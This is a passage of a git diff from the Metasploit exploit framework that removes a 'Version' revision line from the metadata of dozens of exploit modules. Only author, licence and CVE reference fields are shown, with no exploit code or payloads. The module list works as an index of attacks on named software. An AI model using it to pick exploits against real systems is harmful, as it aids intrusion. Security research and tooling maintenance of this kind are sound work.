# metasploit version ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2008-0506' ], diff --git a/modules/exploits/unix/webapp/dogfood_spell_exec.rb b/modules/exploits/unix/webapp/dogfood_spell_exec.rb index 2af2a6f88d..b836beb0f8 100644 --- a/modules/exploits/unix/webapp/dogfood_spell_exec.rb +++ b/modules/exploits/unix/webapp/dogfood_spell_exec.rb @@ -28,7 +28,6 @@ class Metasploit3 < Msf::Exploit::Remote 'patrick', # Added check code, QA tested ok 20090303, there are no references (yet). ], 'License' => BSD_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'OSVDB', '54707' ], diff --git a/modules/exploits/unix/webapp/generic_exec.rb b/modules/exploits/unix/webapp/generic_exec.rb index f7e3e287c0..64f44cdeb1 100644 --- a/modules/exploits/unix/webapp/generic_exec.rb +++ b/modules/exploits/unix/webapp/generic_exec.rb @@ -24,7 +24,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Author' => [ 'hdm' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ ], 'Privileged' => false, 'Payload' => diff --git a/modules/exploits/unix/webapp/google_proxystylesheet_exec.rb b/modules/exploits/unix/webapp/google_proxystylesheet_exec.rb index 8fd854e2f3..1611b9ff2a 100644 --- a/modules/exploits/unix/webapp/google_proxystylesheet_exec.rb +++ b/modules/exploits/unix/webapp/google_proxystylesheet_exec.rb @@ -26,7 +26,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Author' => [ 'hdm' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ ['CVE', '2005-3757'], diff --git a/modules/exploits/unix/webapp/guestbook_ssi_exec.rb b/modules/exploits/unix/webapp/guestbook_ssi_exec.rb index 8fed93c967..c298c6f418 100644 --- a/modules/exploits/unix/webapp/guestbook_ssi_exec.rb +++ b/modules/exploits/unix/webapp/guestbook_ssi_exec.rb @@ -28,7 +28,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Author' => [ 'patrick' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '1999-1053' ], diff --git a/modules/exploits/unix/webapp/joomla_tinybrowser.rb b/modules/exploits/unix/webapp/joomla_tinybrowser.rb index 37754c5ff5..cdb132c5d9 100644 --- a/modules/exploits/unix/webapp/joomla_tinybrowser.rb +++ b/modules/exploits/unix/webapp/joomla_tinybrowser.rb @@ -24,7 +24,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Author' => [ 'spinbad ' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ ['CVE', '2011-4908'], diff --git a/modules/exploits/unix/webapp/mambo_cache_lite.rb b/modules/exploits/unix/webapp/mambo_cache_lite.rb index 55a926d379..bc0b0983a1 100644 --- a/modules/exploits/unix/webapp/mambo_cache_lite.rb +++ b/modules/exploits/unix/webapp/mambo_cache_lite.rb @@ -24,7 +24,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Author' => [ 'MC' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2008-2905' ], diff --git a/modules/exploits/unix/webapp/mitel_awc_exec.rb b/modules/exploits/unix/webapp/mitel_awc_exec.rb index 62d6efab31..56675b2f2c 100644 --- a/modules/exploits/unix/webapp/mitel_awc_exec.rb +++ b/modules/exploits/unix/webapp/mitel_awc_exec.rb @@ -21,7 +21,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Author' => [ 'hdm' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ diff --git a/modules/exploits/unix/webapp/mybb_backdoor.rb b/modules/exploits/unix/webapp/mybb_backdoor.rb index 9b46cab27a..e33c230a4e 100644 --- a/modules/exploits/unix/webapp/mybb_backdoor.rb +++ b/modules/exploits/unix/webapp/mybb_backdoor.rb @@ -24,7 +24,6 @@ class Metasploit3 < Msf::Exploit::Remote 'tdz', ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'BID', '49993' ], diff --git a/modules/exploits/unix/webapp/nagios3_statuswml_ping.rb b/modules/exploits/unix/webapp/nagios3_statuswml_ping.rb index e841b59303..87fe6e5e0e 100644 --- a/modules/exploits/unix/webapp/nagios3_statuswml_ping.rb +++ b/modules/exploits/unix/webapp/nagios3_statuswml_ping.rb @@ -23,7 +23,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Author' => [ 'hdm' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2009-2288' ], diff --git a/modules/exploits/unix/webapp/openview_connectednodes_exec.rb b/modules/exploits/unix/webapp/openview_connectednodes_exec.rb index 4e34c9304f..4606ba9cd5 100644 --- a/modules/exploits/unix/webapp/openview_connectednodes_exec.rb +++ b/modules/exploits/unix/webapp/openview_connectednodes_exec.rb @@ -23,7 +23,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Author' => [ 'Valerio Tesei ', 'hdm' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ ['CVE', '2005-2773'], diff --git a/modules/exploits/unix/webapp/openx_banner_edit.rb b/modules/exploits/unix/webapp/openx_banner_edit.rb index f00bb3a598..9382f18e03 100644 --- a/modules/exploits/unix/webapp/openx_banner_edit.rb +++ b/modules/exploits/unix/webapp/openx_banner_edit.rb @@ -26,7 +26,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Author' => [ 'jduck' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2009-4098' ], diff --git a/modules/exploits/unix/webapp/oracle_vm_agent_utl.rb b/modules/exploits/unix/webapp/oracle_vm_agent_utl.rb index 037e49db01..9865c8716b 100644 --- a/modules/exploits/unix/webapp/oracle_vm_agent_utl.rb +++ b/modules/exploits/unix/webapp/oracle_vm_agent_utl.rb @@ -29,7 +29,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Author' => [ 'jduck' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ # ovs-agent.spec:- Fix ovs agent command injection [orabug 10146644] {CVE-2010-3585} diff --git a/modules/exploits/unix/webapp/oscommerce_filemanager.rb b/modules/exploits/unix/webapp/oscommerce_filemanager.rb index 7da3c173df..5613c667a9 100644 --- a/modules/exploits/unix/webapp/oscommerce_filemanager.rb +++ b/modules/exploits/unix/webapp/oscommerce_filemanager.rb @@ -25,7 +25,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Author' => [ 'egypt' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'OSVDB', '60018' ], diff --git a/modules/exploits/unix/webapp/pajax_remote_exec.rb b/modules/exploits/unix/webapp/pajax_remote_exec.rb index d996342cbe..f0de4a8ebd 100644 --- a/modules/exploits/unix/webapp/pajax_remote_exec.rb +++ b/modules/exploits/unix/webapp/pajax_remote_exec.rb @@ -24,7 +24,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Author' => [ 'Matteo Cantoni ', 'hdm' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ ['CVE', '2006-1551'], diff --git a/modules/exploits/unix/webapp/php_eval.rb b/modules/exploits/unix/webapp/php_eval.rb index 5f65c9fe86..46de6cd341 100644 --- a/modules/exploits/unix/webapp/php_eval.rb +++ b/modules/exploits/unix/webapp/php_eval.rb @@ -21,7 +21,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Author' => [ 'egypt' ], 'License' => BSD_LICENSE, - 'Version' => '$Revision$', 'References' => [ ], 'Privileged' => false, 'Platform' => ['php'], diff --git a/modules/exploits/unix/webapp/php_vbulletin_template.rb b/modules/exploits/unix/webapp/php_vbulletin_template.rb index 7ff5ef42ed..d6d59178ac 100644 --- a/modules/exploits/unix/webapp/php_vbulletin_template.rb +++ b/modules/exploits/unix/webapp/php_vbulletin_template.rb @@ -29,7 +29,6 @@ class Metasploit3 < Msf::Exploit::Remote 'cazz' ], 'License' => BSD_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2005-0511' ], diff --git a/modules/exploits/unix/webapp/php_wordpress_foxypress.rb b/modules/exploits/unix/webapp/php_wordpress_foxypress.rb index e14d898a7f..aac6754e20 100644 --- a/modules/exploits/unix/webapp/php_wordpress_foxypress.rb +++ b/modules/exploits/unix/webapp/php_wordpress_foxypress.rb @@ -27,7 +27,6 @@ class Metasploit3 < Msf::Exploit::Remote 'patrick' # Metasploit module ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ ['EDB', '18991'], diff --git a/modules/exploits/unix/webapp/php_wordpress_lastpost.rb b/modules/exploits/unix/webapp/php_wordpress_lastpost.rb index 5d6a93f30c..e793025eec 100644 --- a/modules/exploits/unix/webapp/php_wordpress_lastpost.rb +++ b/modules/exploits/unix/webapp/php_wordpress_lastpost.rb @@ -24,7 +24,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Author' => [ 'str0ke ', 'hdm' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ ['CVE', '2005-2612'], diff --git a/modules/exploits/unix/webapp/php_xmlrpc_eval.rb b/modules/exploits/unix/webapp/php_xmlrpc_eval.rb index fc374a6fb8..341324be22 100644 --- a/modules/exploits/unix/webapp/php_xmlrpc_eval.rb +++ b/modules/exploits/unix/webapp/php_xmlrpc_eval.rb @@ -25,7 +25,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Author' => [ 'hdm', 'cazz' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ ['CVE', '2005-1921'], diff --git a/modules/exploits/unix/webapp/phpbb_highlight.rb b/modules/exploits/unix/webapp/phpbb_highlight.rb index 077c6287f3..cf373af75f 100644 --- a/modules/exploits/unix/webapp/phpbb_highlight.rb +++ b/modules/exploits/unix/webapp/phpbb_highlight.rb @@ -27,7 +27,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Author' => [ 'valsmith[at]metasploit.com', 'hdm', 'patrick' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2005-2086'], diff --git a/modules/exploits/unix/webapp/phpmyadmin_config.rb b/modules/exploits/unix/webapp/phpmyadmin_config.rb index 0a88755015..00ec94d57e 100644 --- a/modules/exploits/unix/webapp/phpmyadmin_config.rb +++ b/modules/exploits/unix/webapp/phpmyadmin_config.rb @@ -36,7 +36,6 @@ class Metasploit3 < Msf::Exploit::Remote 'egypt' # metasploit module ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2009-1151' ], diff --git a/modules/exploits/unix/webapp/qtss_parse_xml_exec.rb b/modules/exploits/unix/webapp/qtss_parse_xml_exec.rb index 2d96d5f400..31ee74043e 100644 --- a/modules/exploits/unix/webapp/qtss_parse_xml_exec.rb +++ b/modules/exploits/unix/webapp/qtss_parse_xml_exec.rb @@ -23,7 +23,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Author' => [ 'hdm' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'OSVDB', '10562'], diff --git a/modules/exploits/unix/webapp/redmine_scm_exec.rb b/modules/exploits/unix/webapp/redmine_scm_exec.rb index bf6cc7faab..aabc21e54f 100644 --- a/modules/exploits/unix/webapp/redmine_scm_exec.rb +++ b/modules/exploits/unix/webapp/redmine_scm_exec.rb @@ -24,7 +24,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Author' => [ 'joernchen ' ], #Phenoelit 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ ['CVE', '2011-4929'], diff --git a/modules/exploits/unix/webapp/sphpblog_file_upload.rb b/modules/exploits/unix/webapp/sphpblog_file_upload.rb index bd3326d2df..15f633be60 100644 --- a/modules/exploits/unix/webapp/sphpblog_file_upload.rb +++ b/modules/exploits/unix/webapp/sphpblog_file_upload.rb @@ -27,7 +27,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Author' => [ 'Matteo Cantoni ', 'patrick' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ ['CVE', '2005-2733'], diff --git a/modules/exploits/unix/webapp/squirrelmail_pgp_plugin.rb b/modules/exploits/unix/webapp/squirrelmail_pgp_plugin.rb index 90934f39e6..11f7fa5398 100644 --- a/modules/exploits/unix/webapp/squirrelmail_pgp_plugin.rb +++ b/modules/exploits/unix/webapp/squirrelmail_pgp_plugin.rb @@ -30,7 +30,6 @@ class Metasploit3 < Msf::Exploit::Remote Only "cmd/unix/generic" payloads were tested. }, 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'Author' => [ 'Nicob ' ], 'References' => [ diff --git a/modules/exploits/unix/webapp/sugarcrm_unserialize_exec.rb b/modules/exploits/unix/webapp/sugarcrm_unserialize_exec.rb index 5362ed117f..bff07ae5d0 100644 --- a/modules/exploits/unix/webapp/sugarcrm_unserialize_exec.rb +++ b/modules/exploits/unix/webapp/sugarcrm_unserialize_exec.rb @@ -32,7 +32,6 @@ class Metasploit3 < Msf::Exploit::Remote 'sinn3r' # Metasploit module ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2012-0694' ], diff --git a/modules/exploits/unix/webapp/tikiwiki_graph_formula_exec.rb b/modules/exploits/unix/webapp/tikiwiki_graph_formula_exec.rb index 6e3fbd1dad..50486cf5f9 100644 --- a/modules/exploits/unix/webapp/tikiwiki_graph_formula_exec.rb +++ b/modules/exploits/unix/webapp/tikiwiki_graph_formula_exec.rb @@ -25,7 +25,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Author' => [ 'Matteo Cantoni ', 'jduck' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ ['CVE', '2007-5423'], diff --git a/modules/exploits/unix/webapp/tikiwiki_jhot_exec.rb b/modules/exploits/unix/webapp/tikiwiki_jhot_exec.rb index 71810d242f..10d24721cf 100644 --- a/modules/exploits/unix/webapp/tikiwiki_jhot_exec.rb +++ b/modules/exploits/unix/webapp/tikiwiki_jhot_exec.rb @@ -26,7 +26,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Author' => [ 'Matteo Cantoni ' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ ['CVE', '2006-4602'], diff --git a/modules/exploits/unix/webapp/tikiwiki_unserialize_exec.rb b/modules/exploits/unix/webapp/tikiwiki_unserialize_exec.rb index c013b2ca94..5d097ed9fc 100644 --- a/modules/exploits/unix/webapp/tikiwiki_unserialize_exec.rb +++ b/modules/exploits/unix/webapp/tikiwiki_unserialize_exec.rb @@ -37,7 +37,6 @@ class Metasploit3 < Msf::Exploit::Remote 'juan vazquez' # Metasploit module ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2012-0911' ], diff --git a/modules/exploits/unix/webapp/trixbox_langchoice.rb b/modules/exploits/unix/webapp/trixbox_langchoice.rb index 4872b15483..339caadd9d 100644 --- a/modules/exploits/unix/webapp/trixbox_langchoice.rb +++ b/modules/exploits/unix/webapp/trixbox_langchoice.rb @@ -24,7 +24,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Author' => ['chao-mu'], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ ['OSVDB' => '50421'], diff --git a/modules/exploits/unix/webapp/twiki_history.rb b/modules/exploits/unix/webapp/twiki_history.rb index d38171ef53..9f3376e79f 100644 --- a/modules/exploits/unix/webapp/twiki_history.rb +++ b/modules/exploits/unix/webapp/twiki_history.rb @@ -26,7 +26,6 @@ class Metasploit3 < Msf::Exploit::Remote 'jduck' # metasploit version ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2005-2877' ], diff --git a/modules/exploits/unix/webapp/twiki_search.rb b/modules/exploits/unix/webapp/twiki_search.rb index c6d60bf4cb..69b19fb733 100644 --- a/modules/exploits/unix/webapp/twiki_search.rb +++ b/modules/exploits/unix/webapp/twiki_search.rb @@ -26,7 +26,6 @@ class Metasploit3 < Msf::Exploit::Remote 'jduck' # metasploit version ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2004-1037' ], diff --git a/modules/exploits/windows/antivirus/ams_hndlrsvc.rb b/modules/exploits/windows/antivirus/ams_hndlrsvc.rb index 95d53b3430..b468da6060 100644 --- a/modules/exploits/windows/antivirus/ams_hndlrsvc.rb +++ b/modules/exploits/windows/antivirus/ams_hndlrsvc.rb @@ -24,7 +24,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Author' => [ 'MC' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'OSVDB', '66807'], diff --git a/modules/exploits/windows/antivirus/ams_xfr.rb b/modules/exploits/windows/antivirus/ams_xfr.rb index 42683c28e5..4b1f341d5b 100644 --- a/modules/exploits/windows/antivirus/ams_xfr.rb +++ b/modules/exploits/windows/antivirus/ams_xfr.rb @@ -23,7 +23,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Author' => [ 'MC' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2009-1429' ], diff --git a/modules/exploits/windows/antivirus/symantec_iao.rb b/modules/exploits/windows/antivirus/symantec_iao.rb index 1caf46c418..31a6b13a7b 100644 --- a/modules/exploits/windows/antivirus/symantec_iao.rb +++ b/modules/exploits/windows/antivirus/symantec_iao.rb @@ -21,7 +21,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Author' => [ 'MC' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2009-1430' ], diff --git a/modules/exploits/windows/antivirus/symantec_rtvscan.rb b/modules/exploits/windows/antivirus/symantec_rtvscan.rb index bd2a799e40..6350c5759a 100644 --- a/modules/exploits/windows/antivirus/symantec_rtvscan.rb +++ b/modules/exploits/windows/antivirus/symantec_rtvscan.rb @@ -22,7 +22,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Author' => [ 'MC' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ ['CVE', '2006-2630'], diff --git a/modules/exploits/windows/antivirus/trendmicro_serverprotect.rb b/modules/exploits/windows/antivirus/trendmicro_serverprotect.rb index d233e539c9..593072be82 100644 --- a/modules/exploits/windows/antivirus/trendmicro_serverprotect.rb +++ b/modules/exploits/windows/antivirus/trendmicro_serverprotect.rb @@ -22,7 +22,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Author' => [ 'MC' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ ['CVE', '2007-1070'], diff --git a/modules/exploits/windows/antivirus/trendmicro_serverprotect_createbinding.rb b/modules/exploits/windows/antivirus/trendmicro_serverprotect_createbinding.rb index 918c245518..021f5aa047 100644 --- a/modules/exploits/windows/antivirus/trendmicro_serverprotect_createbinding.rb +++ b/modules/exploits/windows/antivirus/trendmicro_serverprotect_createbinding.rb @@ -22,7 +22,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Author' => [ 'MC' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ ['CVE', '2007-2508'], diff --git a/modules/exploits/windows/antivirus/trendmicro_serverprotect_earthagent.rb b/modules/exploits/windows/antivirus/trendmicro_serverprotect_earthagent.rb index 9a54108e21..1cd2ef2490 100644 --- a/modules/exploits/windows/antivirus/trendmicro_serverprotect_earthagent.rb +++ b/modules/exploits/windows/antivirus/trendmicro_serverprotect_earthagent.rb @@ -22,7 +22,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Author' => [ 'MC' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ ['CVE', '2007-2508'], diff --git a/modules/exploits/windows/arkeia/type77.rb b/modules/exploits/windows/arkeia/type77.rb index b7409de448..48a7a64b5c 100644 --- a/modules/exploits/windows/arkeia/type77.rb +++ b/modules/exploits/windows/arkeia/type77.rb @@ -23,7 +23,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Author' => [ 'hdm' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2005-0491' ], diff --git a/modules/exploits/windows/backdoor/energizer_duo_payload.rb b/modules/exploits/windows/backdoor/energizer_duo_payload.rb index 313dff70eb..01148288a7 100644 --- a/modules/exploits/windows/backdoor/energizer_duo_payload.rb +++ b/modules/exploits/windows/backdoor/energizer_duo_payload.rb @@ -24,7 +24,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Author' => [ 'hdm' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ ['CVE', '2010-0103'], diff --git a/modules/exploits/windows/backupexec/name_service.rb b/modules/exploits/windows/backupexec/name_service.rb index 9e6d1a755a..0520de340a 100644 --- a/modules/exploits/windows/backupexec/name_service.rb +++ b/modules/exploits/windows/backupexec/name_service.rb @@ -31,7 +31,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Author' => [ 'hdm' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2004-1172'], diff --git a/modules/exploits/windows/backupexec/remote_agent.rb b/modules/exploits/windows/backupexec/remote_agent.rb index 13e30385cd..405182ade8 100644 --- a/modules/exploits/windows/backupexec/remote_agent.rb +++ b/modules/exploits/windows/backupexec/remote_agent.rb @@ -25,7 +25,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Author' => [ 'hdm' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2005-0773'], diff --git a/modules/exploits/windows/brightstor/ca_arcserve_342.rb b/modules/exploits/windows/brightstor/ca_arcserve_342.rb index c1584c6ad8..993e56130a 100644 --- a/modules/exploits/windows/brightstor/ca_arcserve_342.rb +++ b/modules/exploits/windows/brightstor/ca_arcserve_342.rb @@ -25,7 +25,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Author' => [ 'Nahuel Cayento Riva', 'MC' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'BID', '31684' ], diff --git a/modules/exploits/windows/brightstor/discovery_tcp.rb b/modules/exploits/windows/brightstor/discovery_tcp.rb index 8acb41a022..9b8bba9709 100644 --- a/modules/exploits/windows/brightstor/discovery_tcp.rb +++ b/modules/exploits/windows/brightstor/discovery_tcp.rb @@ -27,7 +27,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Author' => [ 'hdm', 'patrick' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2005-2535'], diff --git a/modules/exploits/windows/brightstor/discovery_udp.rb b/modules/exploits/windows/brightstor/discovery_udp.rb index c8e5aee98c..e5a45e6e64 100644 --- a/modules/exploits/windows/brightstor/discovery_udp.rb +++ b/modules/exploits/windows/brightstor/discovery_udp.rb @@ -24,7 +24,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Author' => [ 'hdm', 'patrick' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2005-0260'], diff --git a/modules/exploits/windows/brightstor/etrust_itm_alert.rb b/modules/exploits/windows/brightstor/etrust_itm_alert.rb index 207154ad86..b48371a935 100644 --- a/modules/exploits/windows/brightstor/etrust_itm_alert.rb +++ b/modules/exploits/windows/brightstor/etrust_itm_alert.rb @@ -23,7 +23,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Author' => [ 'MC' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2007-4620' ], diff --git a/modules/exploits/windows/brightstor/hsmserver.rb b/modules/exploits/windows/brightstor/hsmserver.rb index b43e19fd21..b113812af7 100644 --- a/modules/exploits/windows/brightstor/hsmserver.rb +++ b/modules/exploits/windows/brightstor/hsmserver.rb @@ -22,7 +22,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Author' => [ 'toto' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2007-5082' ], diff --git a/modules/exploits/windows/brightstor/lgserver.rb b/modules/exploits/windows/brightstor/lgserver.rb index 8407deae6e..1cc2a009b7 100644 --- a/modules/exploits/windows/brightstor/lgserver.rb +++ b/modules/exploits/windows/brightstor/lgserver.rb @@ -23,7 +23,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Author' => [ 'MC' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2007-0449' ], diff --git a/modules/exploits/windows/brightstor/lgserver_multi.rb b/modules/exploits/windows/brightstor/lgserver_multi.rb index 9003326a36..2a2d6f4651 100644 --- a/modules/exploits/windows/brightstor/lgserver_multi.rb +++ b/modules/exploits/windows/brightstor/lgserver_multi.rb @@ -24,7 +24,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Author' => [ 'MC' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2007-3216' ], diff --git a/modules/exploits/windows/brightstor/lgserver_rxrlogin.rb b/modules/exploits/windows/brightstor/lgserver_rxrlogin.rb index e3bef411f2..a66fdb35f4 100644 --- a/modules/exploits/windows/brightstor/lgserver_rxrlogin.rb +++ b/modules/exploits/windows/brightstor/lgserver_rxrlogin.rb @@ -22,7 +22,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Author' => [ 'MC' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2007-5003' ], diff --git a/modules/exploits/windows/brightstor/lgserver_rxssetdatagrowthscheduleandfilter.rb b/modules/exploits/windows/brightstor/lgserver_rxssetdatagrowthscheduleandfilter.rb index 330dfa95d2..eecdb65582 100644 --- a/modules/exploits/windows/brightstor/lgserver_rxssetdatagrowthscheduleandfilter.rb +++ b/modules/exploits/windows/brightstor/lgserver_rxssetdatagrowthscheduleandfilter.rb @@ -23,7 +23,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Author' => [ 'MC' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2007-3216' ], diff --git a/modules/exploits/windows/brightstor/lgserver_rxsuselicenseini.rb b/modules/exploits/windows/brightstor/lgserver_rxsuselicenseini.rb index a15b01dfd8..f99e6a6d59 100644 --- a/modules/exploits/windows/brightstor/lgserver_rxsuselicenseini.rb +++ b/modules/exploits/windows/brightstor/lgserver_rxsuselicenseini.rb @@ -22,7 +22,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Author' => [ 'MC' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2007-3216' ], diff --git a/modules/exploits/windows/brightstor/license_gcr.rb b/modules/exploits/windows/brightstor/license_gcr.rb index 89500ddb8a..f4d5354288 100644 --- a/modules/exploits/windows/brightstor/license_gcr.rb +++ b/modules/exploits/windows/brightstor/license_gcr.rb @@ -22,7 +22,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Author' => [ 'MC' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2005-0581' ], diff --git a/modules/exploits/windows/brightstor/mediasrv_sunrpc.rb b/modules/exploits/windows/brightstor/mediasrv_sunrpc.rb index 757bc198f3..0c40d63f7e 100644 --- a/modules/exploits/windows/brightstor/mediasrv_sunrpc.rb +++ b/modules/exploits/windows/brightstor/mediasrv_sunrpc.rb @@ -22,7 +22,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Author' => [ 'toto' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2007-2139'], diff --git a/modules/exploits/windows/brightstor/message_engine.rb b/modules/exploits/windows/brightstor/message_engine.rb index 9a7fc590b6..c40077e978 100644 --- a/modules/exploits/windows/brightstor/message_engine.rb +++ b/modules/exploits/windows/brightstor/message_engine.rb @@ -22,7 +22,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Author' => [ 'MC', 'patrick' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2007-0169' ], diff --git a/modules/exploits/windows/brightstor/message_engine_72.rb b/modules/exploits/windows/brightstor/message_engine_72.rb index 6e48f213e7..fc334f1506 100644 --- a/modules/exploits/windows/brightstor/message_engine_72.rb +++ b/modules/exploits/windows/brightstor/message_engine_72.rb @@ -24,7 +24,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Author' => [ 'MC' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'OSVDB', '68329'], diff --git a/modules/exploits/windows/brightstor/message_engine_heap.rb b/modules/exploits/windows/brightstor/message_engine_heap.rb index 997ee716a2..42237b3b53 100644 --- a/modules/exploits/windows/brightstor/message_engine_heap.rb +++ b/modules/exploits/windows/brightstor/message_engine_heap.rb @@ -22,7 +22,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Author' => [ 'MC' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2006-5143' ], diff --git a/modules/exploits/windows/brightstor/sql_agent.rb b/modules/exploits/windows/brightstor/sql_agent.rb index 6b718f9d87..8e6045e348 100644 --- a/modules/exploits/windows/brightstor/sql_agent.rb +++ b/modules/exploits/windows/brightstor/sql_agent.rb @@ -22,7 +22,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Author' => [ 'hdm' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2005-1272'], diff --git a/modules/exploits/windows/brightstor/tape_engine.rb 